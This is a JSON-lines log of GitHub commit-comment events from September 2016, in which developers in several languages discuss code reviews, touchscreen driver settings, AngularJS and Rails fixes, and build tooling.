{"id":"4614412352","type":"CommitCommentEvent","actor":{"login":"wkddnjset"},"repo":{"name":"wkddnjset/TT"},"payload":{"comment":{"id":19163885,"position":null,"line":null,"path":null,"commit_id":"2179468806e47fff08f750900859e11463369452","created_at":"2016-09-25T15:21:06Z","updated_at":"2016-09-25T15:21:06Z","body":"sd"}},"created_at":"2016-09-25T15:21:06Z"}
{"id":"4614413375","type":"CommitCommentEvent","actor":{"login":"dridri"},"repo":{"name":"ayufan-pine64/device-pine64-common"},"payload":{"comment":{"id":19163887,"position":null,"line":null,"path":null,"commit_id":"5c99e4fc71cebd0004b8e006eb9fe3138150f044","created_at":"2016-09-25T15:21:46Z","updated_at":"2016-09-25T15:21:46Z","body":"If so, there are two different chips that are shipped with the pine64 touchscreen. Because the new settings you just put does not work with the one I received."}},"created_at":"2016-09-25T15:21:46Z"}
{"id":"4614413444","type":"CommitCommentEvent","actor":{"login":"Byron"},"repo":{"name":"gitpython-developers/GitPython"},"payload":{"comment":{"id":19163888,"position":22,"line":113,"path":"git/test/test_repo.py","commit_id":"2ba897b12024fd20681b7c2f1b40bdbbccd5df59","created_at":"2016-09-25T15:21:49Z","updated_at":"2016-09-25T15:21:49Z","body":"@yarikoptic Thanks a bunch ! I just put it back."}},"created_at":"2016-09-25T15:21:49Z"}
{"id":"4614414398","type":"CommitCommentEvent","actor":{"login":"wild-north"},"repo":{"name":"KashaevaDasha/work"},"payload":{"comment":{"id":19163891,"position":3,"line":2,"path":"index.html","commit_id":"65250540f401c3ef8451a664752689b298c25726","created_at":"2016-09-25T15:22:29Z","updated_at":"2016-09-25T15:22:29Z","body":"дай имя апликейшену, например\r\nng-app=\"myApp\", \r\nзатем в своем js файле объявляешь модуль\r\n\r\nangular.module('myApp', [])"}},"created_at":"2016-09-25T15:22:29Z"}
{"id":"4614415114","type":"CommitCommentEvent","actor":{"login":"ayufan"},"repo":{"name":"ayufan-pine64/device-pine64-common"},"payload":{"comment":{"id":19163892,"position":null,"line":null,"path":null,"commit_id":"5c99e4fc71cebd0004b8e006eb9fe3138150f044","created_at":"2016-09-25T15:23:01Z","updated_at":"2016-09-25T15:23:01Z","body":"This explains a lot :)\r\n\r\nI guess that we need to have the easy way to switch between these chips.\r\n\r\nInterestingly the touch shipped to me does work properly, always."}},"created_at":"2016-09-25T15:23:01Z"}
{"id":"4614415408","type":"CommitCommentEvent","actor":{"login":"ButQingMei"},"repo":{"name":"ButQingMei/MyViewGroup"},"payload":{"comment":{"id":19163893,"position":null,"line":null,"path":null,"commit_id":"2912bd2328d30db4be979999b04f14b0ddfa5d70","created_at":"2016-09-25T15:23:12Z","updated_at":"2016-09-25T15:23:12Z","body":"this view is of no special value too much，it is just a practice demo  "}},"created_at":"2016-09-25T15:23:12Z"}
{"id":"4614415411","type":"CommitCommentEvent","actor":{"login":"abriosso"},"repo":{"name":"mrjgreen/db-sync"},"payload":{"comment":{"id":19163894,"position":null,"line":null,"path":null,"commit_id":"bfbe8f132692c4233b1db530e6ae869412a7d711","created_at":"2016-09-25T15:23:12Z","updated_at":"2016-09-25T15:23:12Z","body":"Mr. Green,\r\nis there  a way to sync different columns? I have to sync two databases with diferent tables and different columns. How can I sync with the -c option to be specified to the source and to the target? is it possible?\r\nregards,\r\nAlberto"}},"created_at":"2016-09-25T15:23:12Z"}
{"id":"4614415468","type":"CommitCommentEvent","actor":{"login":"kunnix"},"repo":{"name":"gfreeau/cinnamon-pomodoro"},"payload":{"comment":{"id":19163895,"position":69,"line":539,"path":"pomodoro@gregfreeman.org/applet.js","commit_id":"45fe35f99f251ef24c4ee464f0a339c301d540bb","created_at":"2016-09-25T15:23:16Z","updated_at":"2016-09-25T15:23:16Z","body":"This line seems to have been removed by mistake.\r\n\r\n@Farkal : Can you confirm?"}},"created_at":"2016-09-25T15:23:16Z"}
{"id":"4614415589","type":"CommitCommentEvent","actor":{"login":"bvaughn"},"repo":{"name":"bvaughn/react-virtualized"},"payload":{"comment":{"id":19163896,"position":null,"line":null,"path":null,"commit_id":"674cb66c7e9dfece84ffe7aa82a1cf9bbed68b35","created_at":"2016-09-25T15:23:19Z","updated_at":"2016-09-25T15:23:19Z","body":"I memoize the function call so I won't call it again unless at least one of the parameters have changed."}},"created_at":"2016-09-25T15:23:19Z"}
{"id":"4614416266","type":"CommitCommentEvent","actor":{"login":"DmitriyOK"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19163903,"position":9,"line":9,"path":"backend/src/main/java/ru/avito/web/ServerResponse.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-25T15:23:47Z","updated_at":"2016-09-25T15:23:47Z","body":"Что ты понимаешь под \"одним json\"? Реализовать класс который генерирует JSON-объекты?"}},"created_at":"2016-09-25T15:23:47Z"}
{"id":"4614417217","type":"CommitCommentEvent","actor":{"login":"dridri"},"repo":{"name":"ayufan-pine64/device-pine64-common"},"payload":{"comment":{"id":19163905,"position":null,"line":null,"path":null,"commit_id":"5c99e4fc71cebd0004b8e006eb9fe3138150f044","created_at":"2016-09-25T15:24:29Z","updated_at":"2016-09-25T15:24:29Z","body":"Maybe creating two dtb files could do the trick. Or is there a way to setup it in one of the .rc files ?"}},"created_at":"2016-09-25T15:24:29Z"}
{"id":"4614417453","type":"CommitCommentEvent","actor":{"login":"ifdog"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19163906,"position":null,"line":null,"path":null,"commit_id":"8ac5bc16184f3bc1a265517cc7d3d3f22737fdcf","created_at":"2016-09-25T15:24:38Z","updated_at":"2016-09-25T15:24:38Z","body":"而且还有效，真服了。"}},"created_at":"2016-09-25T15:24:38Z"}
{"id":"4614417823","type":"CommitCommentEvent","actor":{"login":"ayufan"},"repo":{"name":"ayufan-pine64/device-pine64-common"},"payload":{"comment":{"id":19163907,"position":null,"line":null,"path":null,"commit_id":"5c99e4fc71cebd0004b8e006eb9fe3138150f044","created_at":"2016-09-25T15:24:54Z","updated_at":"2016-09-25T15:24:54Z","body":"Do we require separate kernel module?\r\n"}},"created_at":"2016-09-25T15:24:54Z"}
{"id":"4614419621","type":"CommitCommentEvent","actor":{"login":"dridri"},"repo":{"name":"ayufan-pine64/device-pine64-common"},"payload":{"comment":{"id":19163911,"position":null,"line":null,"path":null,"commit_id":"5c99e4fc71cebd0004b8e006eb9fe3138150f044","created_at":"2016-09-25T15:26:10Z","updated_at":"2016-09-25T15:26:10Z","body":"No, both panels are handled by gt9xx_ts.ko"}},"created_at":"2016-09-25T15:26:10Z"}
{"id":"4614420576","type":"CommitCommentEvent","actor":{"login":"ayufan"},"repo":{"name":"ayufan-pine64/device-pine64-common"},"payload":{"comment":{"id":19163913,"position":null,"line":null,"path":null,"commit_id":"5c99e4fc71cebd0004b8e006eb9fe3138150f044","created_at":"2016-09-25T15:26:50Z","updated_at":"2016-09-25T15:26:50Z","body":"Good"}},"created_at":"2016-09-25T15:26:50Z"}
{"id":"4614421017","type":"CommitCommentEvent","actor":{"login":"ayufan"},"repo":{"name":"ayufan-pine64/device-pine64-common"},"payload":{"comment":{"id":19163915,"position":null,"line":null,"path":null,"commit_id":"5c99e4fc71cebd0004b8e006eb9fe3138150f044","created_at":"2016-09-25T15:27:08Z","updated_at":"2016-09-25T15:27:08Z","body":"I saw that it works also on gt911_DB2, so I'll leave your setting."}},"created_at":"2016-09-25T15:27:08Z"}
{"id":"4614422223","type":"CommitCommentEvent","actor":{"login":"wild-north"},"repo":{"name":"KashaevaDasha/work"},"payload":{"comment":{"id":19163916,"position":64,"line":5,"path":"work.js","commit_id":"65250540f401c3ef8451a664752689b298c25726","created_at":"2016-09-25T15:27:56Z","updated_at":"2016-09-25T15:27:56Z","body":"контроллеры сейчас так уже не объявляются, увы\r\nнадо писать\r\nangular.module('myApp') // обращаемся к ранее созданному модулю приложения (обрати внимание на отсутствие второго аргумента - массива зависимостей)\r\n.controller('HelloCtrl', function ($scope) {\r\n  // контроллеры сейчас создают вот так, это тоже упрощенная форма, но для учебы сойдет ;)\r\n});"}},"created_at":"2016-09-25T15:27:56Z"}
{"id":"4614424333","type":"CommitCommentEvent","actor":{"login":"dridri"},"repo":{"name":"ayufan-pine64/device-pine64-common"},"payload":{"comment":{"id":19163920,"position":null,"line":null,"path":null,"commit_id":"5c99e4fc71cebd0004b8e006eb9fe3138150f044","created_at":"2016-09-25T15:29:21Z","updated_at":"2016-09-25T15:29:21Z","body":"Wow, that is actually weird, why a (presumably) new chip could not handle settings that were wrote for an older model :S"}},"created_at":"2016-09-25T15:29:21Z"}
{"id":"4614424354","type":"CommitCommentEvent","actor":{"login":"SvenRoederer"},"repo":{"name":"freifunk-berlin/firmware"},"payload":{"comment":{"id":19163921,"position":null,"line":null,"path":null,"commit_id":"25c5e4409a4af3a5eaa2cefe6b28d4c9d02b00a0","created_at":"2016-09-25T15:29:22Z","updated_at":"2016-09-25T15:29:22Z","body":"any concerns with https://github.com/freifunk-berlin/firmware/pull/389 ?"}},"created_at":"2016-09-25T15:29:22Z"}
{"id":"4614427828","type":"CommitCommentEvent","actor":{"login":"aloscha"},"repo":{"name":"StarcounterPrefabs/Images"},"payload":{"comment":{"id":19163924,"position":6,"line":115,"path":"src/Images/wwwroot/Images/elements/so-juicy-filedrop/juicy-filedrop.html","commit_id":"bdc2dc74304c607f1037320ea5a3bdf0b6ec27da","created_at":"2016-09-25T15:31:35Z","updated_at":"2016-09-25T15:31:35Z","body":"Fix in https://github.com/StarcounterPrefabs/Images/commit/e56dfeb59103c479f8a86b6a7606e6eb2c1ee0c0"}},"created_at":"2016-09-25T15:31:35Z"}
{"id":"4614428001","type":"CommitCommentEvent","actor":{"login":"aloscha"},"repo":{"name":"StarcounterPrefabs/Images"},"payload":{"comment":{"id":19163925,"position":9,"line":13,"path":"src/Images/ViewModels/ConceptIllustrationPage.json.cs","commit_id":"41e27303f248bb780181971ce401d7613db2a375","created_at":"2016-09-25T15:31:43Z","updated_at":"2016-09-25T15:31:43Z","body":"Fix in https://github.com/StarcounterPrefabs/Images/commit/e56dfeb59103c479f8a86b6a7606e6eb2c1ee0c0"}},"created_at":"2016-09-25T15:31:43Z"}
{"id":"4614428140","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19163926,"position":null,"line":null,"path":null,"commit_id":"da4927a1e29ee3a4c0b10ff75cdd0930f55b6e7a","created_at":"2016-09-25T15:31:49Z","updated_at":"2016-09-25T15:31:49Z","body":"OK, please test something that works :-)"}},"created_at":"2016-09-25T15:31:49Z"}
{"id":"4614430707","type":"CommitCommentEvent","actor":{"login":"bgrainger"},"repo":{"name":"bgrainger/MySqlConnector"},"payload":{"comment":{"id":19163929,"position":20,"line":20,"path":"tests/MySqlConnector.Performance/scripts/stress.ps1","commit_id":"320e8915a2aa41a9c19dbaac1d40a84ae887195e","created_at":"2016-09-25T15:33:35Z","updated_at":"2016-09-25T15:33:35Z","body":"Should be `$TARGETS`?"}},"created_at":"2016-09-25T15:33:35Z"}
{"id":"4614433174","type":"CommitCommentEvent","actor":{"login":"MisterFengJJ"},"repo":{"name":"MisterFengJJ/Hello_World"},"payload":{"comment":{"id":19163933,"position":null,"line":null,"path":null,"commit_id":"3b27cdb1e1a586316230bfa393c6e0df29aefd5c","created_at":"2016-09-25T15:35:10Z","updated_at":"2016-09-25T15:35:10Z","body":"第一次commit\r\n"}},"created_at":"2016-09-25T15:35:10Z"}
{"id":"4614434535","type":"CommitCommentEvent","actor":{"login":"coorg"},"repo":{"name":"ekeeke/Genesis-Plus-GX"},"payload":{"comment":{"id":19163935,"position":null,"line":null,"path":null,"commit_id":"8b909e40350ffe7a85176912c60f869221f57510","created_at":"2016-09-25T15:35:59Z","updated_at":"2016-09-25T15:35:59Z","body":"hmmm - I'm on on of the latest nightly builds - I will try deleting autoconfig files and maybe a fresh build later tonight. Is that version 1.0.0.2 you have there?"}},"created_at":"2016-09-25T15:35:59Z"}
{"id":"4614434690","type":"CommitCommentEvent","actor":{"login":"Deepcoinbiz"},"repo":{"name":"Deepcoinbiz/Deepcoin"},"payload":{"comment":{"id":19163936,"position":9,"line":1195,"path":"src/net.cpp","commit_id":"f6b59c8f630c6cd668e1d72afdfc096bc0b3aec1","created_at":"2016-09-25T15:36:06Z","updated_at":"2016-09-25T15:36:06Z","body":"{\"static1.dcn.pm\", \"static1.dcn.pm\"},"}},"created_at":"2016-09-25T15:36:06Z"}
{"id":"4614435226","type":"CommitCommentEvent","actor":{"login":"lzy"},"repo":{"name":"cffextech/codeGenerator"},"payload":{"comment":{"id":19163938,"position":null,"line":null,"path":null,"commit_id":"42a64358049ac0d677cb8ce339f0f1818cee85c1","created_at":"2016-09-25T15:36:29Z","updated_at":"2016-09-25T15:36:29Z","body":"Hi,\r\n\r\n請問您是？\r\n\r\n2016年9月25日 23:02，\"刘智勇\" <notifications@github.com>寫道：\r\n\r\n> 重构1.0版，可运行的@lzy\r\n>\r\n> --\r\n> You are receiving this because you were mentioned.\r\n> Reply to this email directly or view it on GitHub:\r\n> https://github.com/cffextech/codeGenerator/commit/\r\n> 42a64358049ac0d677cb8ce339f0f1818cee85c1\r\n"}},"created_at":"2016-09-25T15:36:29Z"}
{"id":"4614437843","type":"CommitCommentEvent","actor":{"login":"cbeck"},"repo":{"name":"dawnaara/blocmetrics"},"payload":{"comment":{"id":19163942,"position":13,"line":13,"path":"app/controllers/registered_applications_controller.rb","commit_id":"eaab9074914e6a9799e060a7e4d81828cea1c73b","created_at":"2016-09-25T15:38:11Z","updated_at":"2016-09-25T15:38:11Z","body":"So you don't have any code here to actually save the record. You are setting it up correctly, but missing the @registered_application.save call. "}},"created_at":"2016-09-25T15:38:11Z"}
{"id":"4614438650","type":"CommitCommentEvent","actor":{"login":"jarrodwb"},"repo":{"name":"typelevel/cats"},"payload":{"comment":{"id":19163944,"position":null,"line":null,"path":null,"commit_id":"890e04fb8f8a86abd4004dd49ee2cc24188b8114","created_at":"2016-09-25T15:38:43Z","updated_at":"2016-09-25T15:38:43Z","body":"It seems like there are still a few section headings that are not rendered correctly.\r\n\r\n`# Getting Started`, `<a name “motivations”></a> # Motivations`, `# Project Structure` and `# Copyright and License`\r\n\r\nI copied these examples from http://typelevel.org/cats/index.html."}},"created_at":"2016-09-25T15:38:43Z"}
{"id":"4614439162","type":"CommitCommentEvent","actor":{"login":"cbeck"},"repo":{"name":"dawnaara/blocmetrics"},"payload":{"comment":{"id":19163945,"position":2,"line":2,"path":"app/controllers/registered_applications_controller.rb","commit_id":"eaab9074914e6a9799e060a7e4d81828cea1c73b","created_at":"2016-09-25T15:39:06Z","updated_at":"2016-09-25T15:39:06Z","body":"You can't have this without limiting it to certain actions. You will never have an id for the following actions: index, new, and create. "}},"created_at":"2016-09-25T15:39:06Z"}
{"id":"4614440558","type":"CommitCommentEvent","actor":{"login":"ekeeke"},"repo":{"name":"ekeeke/Genesis-Plus-GX"},"payload":{"comment":{"id":19163952,"position":null,"line":null,"path":null,"commit_id":"8b909e40350ffe7a85176912c60f869221f57510","created_at":"2016-09-25T15:40:03Z","updated_at":"2016-09-25T15:40:03Z","body":"Yes, I don't really use Retroarch apart for testing libretro changes from time to time so I never bothered to update."}},"created_at":"2016-09-25T15:40:03Z"}
{"id":"4614440649","type":"CommitCommentEvent","actor":{"login":"tomarcafe"},"repo":{"name":"GolosChain/wiki"},"payload":{"comment":{"id":19163953,"position":null,"line":null,"path":null,"commit_id":"ca495de0269108924b2a815278b392fd80337e23","created_at":"2016-09-25T15:40:07Z","updated_at":"2016-09-25T15:40:07Z","body":"like! and +5!!!! to this feature "}},"created_at":"2016-09-25T15:40:07Z"}
{"id":"4614441315","type":"CommitCommentEvent","actor":{"login":"jarrodwb"},"repo":{"name":"typelevel/cats"},"payload":{"comment":{"id":19163956,"position":null,"line":null,"path":null,"commit_id":"890e04fb8f8a86abd4004dd49ee2cc24188b8114","created_at":"2016-09-25T15:40:31Z","updated_at":"2016-09-25T15:40:31Z","body":"That page says it was last updated on August 21st. Maybe that has something to do with it."}},"created_at":"2016-09-25T15:40:31Z"}
{"id":"4614443722","type":"CommitCommentEvent","actor":{"login":"tomarcafe"},"repo":{"name":"GolosChain/wiki"},"payload":{"comment":{"id":19163961,"position":null,"line":null,"path":null,"commit_id":"ca495de0269108924b2a815278b392fd80337e23","created_at":"2016-09-25T15:42:10Z","updated_at":"2016-09-25T15:42:10Z","body":"одна пара ключей - 1 токен. скидку выбивать из админа"}},"created_at":"2016-09-25T15:42:10Z"}
{"id":"4614444085","type":"CommitCommentEvent","actor":{"login":"golfromeo-fr"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19163962,"position":null,"line":null,"path":null,"commit_id":"870a7ac9c3a7f5acbe59c20974eff902739d7be8","created_at":"2016-09-25T15:42:23Z","updated_at":"2016-09-25T15:42:23Z","body":"ok but it doesn't create the folder and may cause some trouble."}},"created_at":"2016-09-25T15:42:23Z"}
{"id":"4614444489","type":"CommitCommentEvent","actor":{"login":"I-CAM"},"repo":{"name":"I-CAM/I-CAM"},"payload":{"comment":{"id":19163963,"position":null,"line":null,"path":null,"commit_id":"144b375efeadd6d1680a8a14eaeedae9a6f778fd","created_at":"2016-09-25T15:42:40Z","updated_at":"2016-09-25T15:42:40Z","body":"Hello-world\r\nI like  website and i want to take my code to my group."}},"created_at":"2016-09-25T15:42:40Z"}
{"id":"4614446190","type":"CommitCommentEvent","actor":{"login":"ragu26"},"repo":{"name":"ragu26/Text-Mining-Recommendation-System"},"payload":{"comment":{"id":19163965,"position":null,"line":null,"path":null,"commit_id":"46218801510023dd728eb20f7f334637244ac173","created_at":"2016-09-25T15:43:50Z","updated_at":"2016-09-25T15:43:50Z","body":"Describing ways I used to build a recommendation system"}},"created_at":"2016-09-25T15:43:50Z"}
{"id":"4614449112","type":"CommitCommentEvent","actor":{"login":"jjallaire"},"repo":{"name":"rstudio/spark.rstudio.com"},"payload":{"comment":{"id":19163971,"position":null,"line":null,"path":null,"commit_id":"cc6d79b68489c1fbb6757faec7e0b3ade687cd1e","created_at":"2016-09-25T15:45:50Z","updated_at":"2016-09-25T15:45:50Z","body":"@ledell In order to get the examples to run I had to add an `sc` argument to the calls to `as_h2o_frame`.\r\n\r\nThat said, it actually isn't necessary for the `as_h2o_frame` function to take an `sc` argument since you can always get the `sc` from the data frame you are passed using the `spark_connection` S3 generic. You should re-write the function as follows to eliminate the `sc` argument:\r\n\r\n```r\r\nas_h2o_frame <- function (x) {\r\n  x <- sparklyr::spark_dataframe(x)\r\n  sc <- sparklyr::spark_connection(x)\r\n  jhf <- sparklyr::invoke(h2o_context(x), \"asH2OFrame\", x)\r\n  key <- sparklyr::invoke(sparklyr::invoke(jhf, \"key\"), \"toString\")\r\n  h2o::h2o.getFrame(key)\r\n}\r\n```\r\n\r\n"}},"created_at":"2016-09-25T15:45:50Z"}
{"id":"4614449549","type":"CommitCommentEvent","actor":{"login":"dreamhe"},"repo":{"name":"dreamhe/helloworld"},"payload":{"comment":{"id":19163973,"position":null,"line":null,"path":null,"commit_id":"eb1e7e9dfe990811f324ff9297e25cf2c288f222","created_at":"2016-09-25T15:46:08Z","updated_at":"2016-09-25T15:46:08Z","body":"comment   commit"}},"created_at":"2016-09-25T15:46:08Z"}
{"id":"4614450201","type":"CommitCommentEvent","actor":{"login":"pkdtheking"},"repo":{"name":"pkdtheking/CompetitiveCode"},"payload":{"comment":{"id":19163975,"position":3,"line":3,"path":"src/GridlandMetro.java","commit_id":"4cd8fd3a41a4cc172952aed4f4cc4814319cb160","created_at":"2016-09-25T15:46:34Z","updated_at":"2016-09-25T15:46:34Z","body":"Code has to be updated."}},"created_at":"2016-09-25T15:46:34Z"}
{"id":"4614451460","type":"CommitCommentEvent","actor":{"login":"pkdtheking"},"repo":{"name":"pkdtheking/CompetitiveCode"},"payload":{"comment":{"id":19163977,"position":1,"line":1,"path":"bin/input.in","commit_id":"4cd8fd3a41a4cc172952aed4f4cc4814319cb160","created_at":"2016-09-25T15:47:25Z","updated_at":"2016-09-25T15:47:25Z","body":"Please do not add unchanged file"}},"created_at":"2016-09-25T15:47:25Z"}
{"id":"4614452402","type":"CommitCommentEvent","actor":{"login":"vegeta897"},"repo":{"name":"JMTK/d-zone"},"payload":{"comment":{"id":19163979,"position":null,"line":null,"path":null,"commit_id":"9b4330cd71fc2770146cd305d740f9abb7fbd6bd","created_at":"2016-09-25T15:48:01Z","updated_at":"2016-09-25T15:48:01Z","body":"Good catch, can I expect a PR?"}},"created_at":"2016-09-25T15:48:01Z"}
{"id":"4614454706","type":"CommitCommentEvent","actor":{"login":"jstrube"},"repo":{"name":"jstrube/LCIO.jl"},"payload":{"comment":{"id":19163981,"position":null,"line":null,"path":null,"commit_id":"56518c240aa31506ee9a849ef3045665e09d3001","created_at":"2016-09-25T15:49:36Z","updated_at":"2016-09-25T15:49:36Z","body":"Wow, impressive level of thoroughness. Thanks! I appreciate the pointer.\r\nI was trying to hack around a failing clone when the package already exists. I guess I shot myself in the foot. Will fix."}},"created_at":"2016-09-25T15:49:36Z"}
{"id":"4614458375","type":"CommitCommentEvent","actor":{"login":"pablocarderam"},"repo":{"name":"pablocarderam/genetargeter"},"payload":{"comment":{"id":19163986,"position":null,"line":null,"path":null,"commit_id":"1474d62bb99d3e265b9443872ed841c9a7ab370c","created_at":"2016-09-25T15:52:07Z","updated_at":"2016-09-25T15:52:07Z","body":"adjusted gblock primer params"}},"created_at":"2016-09-25T15:52:07Z"}
{"id":"4614458775","type":"CommitCommentEvent","actor":{"login":"zador-blood-stained"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19163989,"position":null,"line":null,"path":null,"commit_id":"870a7ac9c3a7f5acbe59c20974eff902739d7be8","created_at":"2016-09-25T15:52:20Z","updated_at":"2016-09-25T15:52:20Z","body":"Just checked - ccache **does** create the directory and config file if it doesn't exist"}},"created_at":"2016-09-25T15:52:20Z"}
{"id":"4614459697","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"atamariya/UniversalMediaServer"},"payload":{"comment":{"id":19163991,"position":5,"line":112,"path":"src/main/java/net/pms/dlna/DLNAResource.java","commit_id":"3b43af866b15df8de2a8ee91da3308dabed36b8d","created_at":"2016-09-25T15:52:56Z","updated_at":"2016-09-25T15:52:56Z","body":"@atamariya I'm just asking because I don't understand: How does ```transient``` prevent ```ConcurrentModificationException```? Is it at all relevant, is this class ever packed?"}},"created_at":"2016-09-25T15:52:56Z"}
{"id":"4614461960","type":"CommitCommentEvent","actor":{"login":"ruslangaripov"},"repo":{"name":"Serg-Norseman/GEDKeeper"},"payload":{"comment":{"id":19163993,"position":103,"line":259,"path":"projects/GEDKeeper2/Externals/RusDeclension.cs","commit_id":"240cc89fe9efe94708157d7773903118d3345893","created_at":"2016-09-25T15:54:31Z","updated_at":"2016-09-25T15:54:31Z","body":"I wonder... what your desktop resolution is? 😆 4,096 pixels in width with 96 DPI, ain't it?"}},"created_at":"2016-09-25T15:54:31Z"}
{"id":"4614462336","type":"CommitCommentEvent","actor":{"login":"ZanderBrown"},"repo":{"name":"ZanderBrown/Tiborcim"},"payload":{"comment":{"id":19163994,"position":null,"line":null,"path":null,"commit_id":"030ec5fba882fc1107477395d6f73867721ab426","created_at":"2016-09-25T15:54:46Z","updated_at":"2016-09-25T15:54:46Z","body":"See #5 "}},"created_at":"2016-09-25T15:54:46Z"}
{"id":"4614463709","type":"CommitCommentEvent","actor":{"login":"sfi0zy"},"repo":{"name":"sfi0zy/jekyll-less"},"payload":{"comment":{"id":19163997,"position":null,"line":null,"path":null,"commit_id":"ef28fd77dfa18f6b23024622abd3238ed6b1f9ad","created_at":"2016-09-25T15:55:25Z","updated_at":"2016-09-25T15:55:25Z","body":"Jekyll 3.2.1 with Ruby 2.3.1 on linux can't build website and fails with error:\r\nError:  uninitialized class variable @@mtimes in Jekyll::Less::LessCssFile\r\nThis commit fixes this error."}},"created_at":"2016-09-25T15:55:25Z"}
{"id":"4614464456","type":"CommitCommentEvent","actor":{"login":"Kotolegokot"},"repo":{"name":"Kotolegokot/PlaneRunner"},"payload":{"comment":{"id":19163998,"position":null,"line":null,"path":null,"commit_id":"246b58fa72e6c9adba892d8d9e242d9022ef8e0b","created_at":"2016-09-25T15:55:42Z","updated_at":"2016-09-25T15:55:42Z","body":"It turned out making generation more random was implemented in the previous commit, not in this one =/"}},"created_at":"2016-09-25T15:55:42Z"}
{"id":"4614464738","type":"CommitCommentEvent","actor":{"login":"Zayelion"},"repo":{"name":"Buttys/Dev_ygopro"},"payload":{"comment":{"id":19163999,"position":null,"line":null,"path":null,"commit_id":"98663521d53ec61ebf877b83dff712875c6e8d80","created_at":"2016-09-25T15:55:55Z","updated_at":"2016-09-25T15:55:55Z","body":"-f is needed for battlepack, draft, and future development of a storyline mode."}},"created_at":"2016-09-25T15:55:55Z"}
{"id":"4614464946","type":"CommitCommentEvent","actor":{"login":"Kotolegokot"},"repo":{"name":"Kotolegokot/PlaneRunner"},"payload":{"comment":{"id":19164000,"position":4,"line":64,"path":"src/Game.cpp","commit_id":"246b58fa72e6c9adba892d8d9e242d9022ef8e0b","created_at":"2016-09-25T15:56:04Z","updated_at":"2016-09-25T15:56:04Z","body":"Just fog, nothing common with the bug"}},"created_at":"2016-09-25T15:56:04Z"}
{"id":"4614468509","type":"CommitCommentEvent","actor":{"login":"MaximDanilov"},"repo":{"name":"MaximDanilov/GIIS"},"payload":{"comment":{"id":19164004,"position":null,"line":null,"path":null,"commit_id":"a861894cf8b9be88744e5b0bc12e6477b20210e5","created_at":"2016-09-25T15:58:35Z","updated_at":"2016-09-25T15:58:35Z","body":"Добавил компонент с координатной сеткой и октантами. Есть небольшие проблемы с рисованием конечных линий после работы алгоритма. Надо отдебажить.\r\n"}},"created_at":"2016-09-25T15:58:35Z"}
{"id":"4614470076","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19164012,"position":null,"line":null,"path":null,"commit_id":"3854578fcde31efc902753f6b4db425a091ec094","created_at":"2016-09-25T15:59:41Z","updated_at":"2016-09-25T15:59:41Z","body":"Not perfect\r\n\r\n![capture du 2016-09-25 17-59-03](https://cloud.githubusercontent.com/assets/1439428/18816415/cbdb065c-8349-11e6-95a0-94f9903afff1.png)\r\n"}},"created_at":"2016-09-25T15:59:41Z"}
{"id":"4614472458","type":"CommitCommentEvent","actor":{"login":"kofelo123"},"repo":{"name":"kofelo123/smartitcording"},"payload":{"comment":{"id":19164014,"position":null,"line":null,"path":null,"commit_id":"370031be08e6e651e7c669b1ee4ace5ccd8e2575","created_at":"2016-09-25T16:00:59Z","updated_at":"2016-09-25T16:00:59Z","body":"부트스트랩 테마의 영문글자를 만들고자 하는 게시판의 취지에 맞게 다듬었다.\r\n\r\n사이트에 github와 연동되게끔 링크를 걸었다.\r\n\r\nhome.jsp에서 <jsp:forward>시 url변경없이 포함시키는 개념으로-> 페이징에서 다른페이지로 넘어갈때\r\nsboard/ 없이 넘어가는 url이 되다 보니 에러(페이징에서 url이 sboard/뒤에만 변경되서\r\n-> <c:redirect url=\"\">로 수정\r\n"}},"created_at":"2016-09-25T16:00:59Z"}
{"id":"4614472472","type":"CommitCommentEvent","actor":{"login":"FrancescoArca"},"repo":{"name":"FrancescoArca/Template"},"payload":{"comment":{"id":19164015,"position":null,"line":null,"path":null,"commit_id":"4437cd13db7d1f2e2221d59374d480fc5373cc1d","created_at":"2016-09-25T16:01:00Z","updated_at":"2016-09-25T16:01:00Z","body":"vbfgbdfhbdfhg"}},"created_at":"2016-09-25T16:01:00Z"}
{"id":"4614475994","type":"CommitCommentEvent","actor":{"login":"gpandcb"},"repo":{"name":"gpandcb/frameworks_native"},"payload":{"comment":{"id":19164018,"position":null,"line":null,"path":null,"commit_id":"b835aff1678af5ba813e6b753f2362ab804240d1","created_at":"2016-09-25T16:03:04Z","updated_at":"2016-09-25T16:03:04Z","body":"a"}},"created_at":"2016-09-25T16:03:04Z"}
{"id":"4614477065","type":"CommitCommentEvent","actor":{"login":"isuPatches"},"repo":{"name":"isuPatches/RockThePatchv4"},"payload":{"comment":{"id":19164021,"position":null,"line":null,"path":null,"commit_id":"fa4e3b947765034c68c8992e3021cb2fc03302ef","created_at":"2016-09-25T16:03:47Z","updated_at":"2016-09-25T16:03:47Z","body":"Closes #6 "}},"created_at":"2016-09-25T16:03:47Z"}
{"id":"4614478177","type":"CommitCommentEvent","actor":{"login":"Okalia"},"repo":{"name":"Okalia/PersonalBlog"},"payload":{"comment":{"id":19164023,"position":null,"line":null,"path":null,"commit_id":"fed6d5679720c48705c6696b80cec2ae38ade0cb","created_at":"2016-09-25T16:04:32Z","updated_at":"2016-09-25T16:04:32Z","body":"![default](https://cloud.githubusercontent.com/assets/11776810/18816445/e1dfa0da-8352-11e6-99b6-c09be0f854b1.png)\r\n"}},"created_at":"2016-09-25T16:04:32Z"}
{"id":"4614479925","type":"CommitCommentEvent","actor":{"login":"isuPatches"},"repo":{"name":"isuPatches/RockThePatchv4"},"payload":{"comment":{"id":19164025,"position":null,"line":null,"path":null,"commit_id":"cc4369a8f7f9a7681e3906fb26a0d248db15d274","created_at":"2016-09-25T16:05:39Z","updated_at":"2016-09-25T16:05:39Z","body":"close #16 "}},"created_at":"2016-09-25T16:05:39Z"}
